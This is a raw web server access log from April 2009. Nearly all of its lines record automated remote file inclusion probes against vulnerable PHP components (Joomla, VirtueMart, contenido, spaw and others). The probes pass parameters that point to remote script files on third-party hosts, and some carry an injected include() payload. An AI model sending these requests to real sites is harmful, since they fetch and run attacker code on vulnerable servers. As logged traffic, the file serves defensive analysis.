58.227.193.198 - - [10/Apr/2009:09:43:44 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:09:43:46 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 184992 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:09:44:39 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.16.182.130 - - [10/Apr/2009:09:48:00 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.esoterikha.com/scgi-bin/boletim/header.jpg? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
83.16.182.130 - - [10/Apr/2009:09:48:00 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.esoterikha.com/scgi-bin/boletim/header.jpg? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
77.79.244.216 - - [10/Apr/2009:09:48:22 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.blix.cc/language/idd.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.65"
77.79.244.216 - - [10/Apr/2009:09:48:23 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.blix.cc/language/idd.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
77.79.244.216 - - [10/Apr/2009:09:49:01 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.blix.cc/language/idd.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.65"
77.79.244.216 - - [10/Apr/2009:09:49:01 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.blix.cc/language/idd.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
207.182.253.196 - - [10/Apr/2009:09:49:40 -0500] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.chodskypes.net/mambots/aJ.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.182.253.196 - - [10/Apr/2009:09:49:40 -0500] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.chodskypes.net/mambots/aJ.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.253.196 - - [10/Apr/2009:09:49:40 -0500] "GET /logs/access_log.1234224000/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.chodskypes.net/mambots/aJ.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
207.182.253.196 - - [10/Apr/2009:09:49:59 -0500] "GET /logs/access_log.1235779200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.chodskypes.net/mambots/aJ.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
207.182.253.196 - - [10/Apr/2009:09:50:04 -0500] "GET //include.php?path[docroot]=http://www.chodskypes.net/mambots/aJ.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
207.182.253.196 - - [10/Apr/2009:09:50:04 -0500] "GET /logs//include.php?path[docroot]=http://www.chodskypes.net/mambots/aJ.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.182.253.196 - - [10/Apr/2009:09:50:04 -0500] "GET /logs/access_log.1237420800//include.php?path[docroot]=http://www.chodskypes.net/mambots/aJ.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.55.208.131 - - [10/Apr/2009:09:56:17 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [10/Apr/2009:09:56:17 -0500] "GET /logs/access_log.1222300800 HTTP/1.1" 200 7932 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [10/Apr/2009:09:57:42 -0500] "GET /logs//index.php?lang=en&page=http://admins.onceinalifespan.com/test.txt??%0D? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
219.85.63.226 - - [10/Apr/2009:09:57:42 -0500] "GET //index.php?lang=en&page=http://admins.onceinalifespan.com/test.txt??%0D? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
62.44.79.35 - - [10/Apr/2009:09:58:12 -0500] "GET /logs/access_log.1233014400/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
62.44.79.35 - - [10/Apr/2009:09:58:12 -0500] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
62.44.79.35 - - [10/Apr/2009:09:58:12 -0500] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.44.79.35 - - [10/Apr/2009:09:58:39 -0500] "GET /logs/access_log.1236384000/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:45 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:45 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:45 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:45 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:46 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:46 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:46 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:47 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:47 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:49 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:49 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.151.241.1 - - [10/Apr/2009:09:58:49 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
219.85.63.226 - - [10/Apr/2009:09:59:05 -0500] "GET /logs/index.php?id=&lang=http://admins.onceinalifespan.com/test.txt??%0D? HTTP/1.1" 404 297 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
219.85.63.226 - - [10/Apr/2009:09:59:05 -0500] "GET /index.php?id=&lang=http://admins.onceinalifespan.com/test.txt??%0D? HTTP/1.1" 404 292 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
84.45.45.133 - - [10/Apr/2009:10:00:46 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.buttecreekcanyon.net/History/0sirys.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.823"
84.45.45.133 - - [10/Apr/2009:10:00:46 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.buttecreekcanyon.net/History/0sirys.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.823"
60.251.60.100 - - [10/Apr/2009:10:01:25 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.69"
60.251.60.100 - - [10/Apr/2009:10:01:26 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.69"
83.137.192.223 - - [10/Apr/2009:10:02:31 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.137.192.223 - - [10/Apr/2009:10:02:31 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.137.192.223 - - [10/Apr/2009:10:02:31 -0500] "GET /logs/access_log.1233619200//index.php?_SERVER[DOCUMENT_ROOT]=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
76.74.236.100 - - [10/Apr/2009:10:03:40 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
76.74.236.100 - - [10/Apr/2009:10:03:40 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
76.74.236.100 - - [10/Apr/2009:10:03:40 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
76.74.236.100 - - [10/Apr/2009:10:03:44 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
76.74.236.100 - - [10/Apr/2009:10:03:44 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
76.74.236.100 - - [10/Apr/2009:10:03:44 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
76.74.236.100 - - [10/Apr/2009:10:04:03 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
76.74.236.100 - - [10/Apr/2009:10:04:10 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
76.74.236.100 - - [10/Apr/2009:10:04:10 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.149.244.64 - - [10/Apr/2009:10:07:18 -0500] "GET /logs//include/write.php?dir=http://www.imprex.co.kr/bbs//skin/happycast_blue/tek.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.806"
89.149.244.64 - - [10/Apr/2009:10:07:18 -0500] "GET //include/write.php?dir=http://www.imprex.co.kr/bbs//skin/happycast_blue/tek.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.806"
62.44.79.35 - - [10/Apr/2009:10:08:15 -0500] "GET /logs/access_log.1235779200/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:10:08:31 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:10:08:32 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:10:08:32 -0500] "GET /logs/access_log.1233619200//index.php?_SERVER[DOCUMENT_ROOT]=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.86.236.106 - - [10/Apr/2009:10:09:27 -0500] "GET /logs/?dir[plugins]=http://www.pflugerlist.com/images/logo.jpg?? HTTP/1.1" 200 184992 "-""libwww-perl/5.810"
70.86.236.106 - - [10/Apr/2009:10:09:27 -0500] "GET /?dir[plugins]=http://www.pflugerlist.com/images/logo.jpg?? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
125.251.161.165 - - [10/Apr/2009:10:09:39 -0500] "GET /logs/access_log.1236297600//index.php?_SERVER[DOCUMENT_ROOT]=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.213.148 - - [10/Apr/2009:10:09:48 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
85.17.213.148 - - [10/Apr/2009:10:09:48 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
85.17.213.148 - - [10/Apr/2009:10:09:48 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
78.110.50.115 - - [10/Apr/2009:10:10:04 -0500] "GET /logs/access_log.1233619200//?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.skkulove.com/bbs/zs/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.115 - - [10/Apr/2009:10:10:04 -0500] "GET //?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.skkulove.com/bbs/zs/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.110.50.115 - - [10/Apr/2009:10:10:06 -0500] "GET /logs//?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.skkulove.com/bbs/zs/id.txt?? HTTP/1.1" 200 184997 "-""Mozilla/5.0"
78.110.50.115 - - [10/Apr/2009:10:10:45 -0500] "GET /logs/access_log.1236297600//?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.skkulove.com/bbs/zs/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
83.138.168.158 - - [10/Apr/2009:10:11:15 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [10/Apr/2009:10:11:15 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [10/Apr/2009:10:11:15 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.104.37.122 - - [10/Apr/2009:10:11:36 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
216.104.37.122 - - [10/Apr/2009:10:11:36 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
83.138.168.158 - - [10/Apr/2009:10:11:54 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [10/Apr/2009:10:11:54 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [10/Apr/2009:10:11:54 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [10/Apr/2009:10:11:58 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [10/Apr/2009:10:11:58 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [10/Apr/2009:10:11:58 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:10:13:56 -0500] "GET //?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:10:13:56 -0500] "GET /logs/access_log.1233619200//?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:10:13:59 -0500] "GET /logs//?DOCUMENT_ROOT=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 200 184997 "-""Mozilla/5.0"
210.112.122.13 - - [10/Apr/2009:10:14:13 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://cocoking.com/upload/gallery/id.txt?%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
210.112.122.13 - - [10/Apr/2009:10:14:13 -0500] "GET /logs/access_log.1236384000//admin/spaw/spaw_control.class.php?spaw_root=http://cocoking.com/upload/gallery/id.txt?%0D?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
210.112.122.13 - - [10/Apr/2009:10:14:13 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://cocoking.com/upload/gallery/id.txt?%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
210.112.122.13 - - [10/Apr/2009:10:14:13 -0500] "GET /logs/access_log.1237248000//admin/spaw/spaw_control.class.php?spaw_root=http://cocoking.com/upload/gallery/id.txt?%0D?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
83.138.168.158 - - [10/Apr/2009:10:14:24 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [10/Apr/2009:10:14:24 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [10/Apr/2009:10:14:24 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.73.140.200 - - [10/Apr/2009:10:17:38 -0500] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
69.73.140.200 - - [10/Apr/2009:10:17:38 -0500] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
210.112.122.13 - - [10/Apr/2009:10:18:13 -0500] "GET /logs/access_log.1236988800//admin/spaw/spaw_control.class.php?spaw_root=http://cocoking.com/upload/gallery/id.txt?%0D?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
198.106.204.186 - - [10/Apr/2009:10:18:15 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 321 "-""Mozilla/5.0"
198.106.204.186 - - [10/Apr/2009:10:18:15 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 326 "-""Mozilla/5.0"
198.106.204.186 - - [10/Apr/2009:10:18:15 -0500] "GET /logs/access_log.1236729600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 348 "-""Mozilla/5.0"
210.112.122.13 - - [10/Apr/2009:10:19:52 -0500] "GET /logs/access_log.1233187200//admin/spaw/spaw_control.class.php?spaw_root=http://cocoking.com/upload/gallery/id.txt?%0D?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
193.178.144.209 - - [10/Apr/2009:10:23:12 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://diablow.webs.com/FX29ID1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
193.178.144.209 - - [10/Apr/2009:10:23:12 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://diablow.webs.com/FX29ID1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
193.178.144.209 - - [10/Apr/2009:10:23:12 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://diablow.webs.com/FX29ID1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
65.55.208.136 - - [10/Apr/2009:10:23:16 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [10/Apr/2009:10:23:16 -0500] "GET /logs/access_log.1107388800 HTTP/1.1" 200 248 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
88.191.89.65 - - [10/Apr/2009:10:26:42 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:10:26:42 -0500] "GET /?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:10:26:44 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 184992 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:10:27:15 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:10:27:15 -0500] "GET /?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:10:27:17 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 184992 "-""Mozilla/5.0"
60.251.60.100 - - [10/Apr/2009:10:27:44 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.69"
60.251.60.100 - - [10/Apr/2009:10:27:44 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.69"
69.73.140.200 - - [10/Apr/2009:10:27:56 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
69.73.140.200 - - [10/Apr/2009:10:27:56 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
218.27.203.107 - - [10/Apr/2009:10:29:43 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.27.203.107 - - [10/Apr/2009:10:29:43 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.27.203.107 - - [10/Apr/2009:10:29:43 -0500] "GET /logs/access_log.1236902400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.27.203.107 - - [10/Apr/2009:10:29:43 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
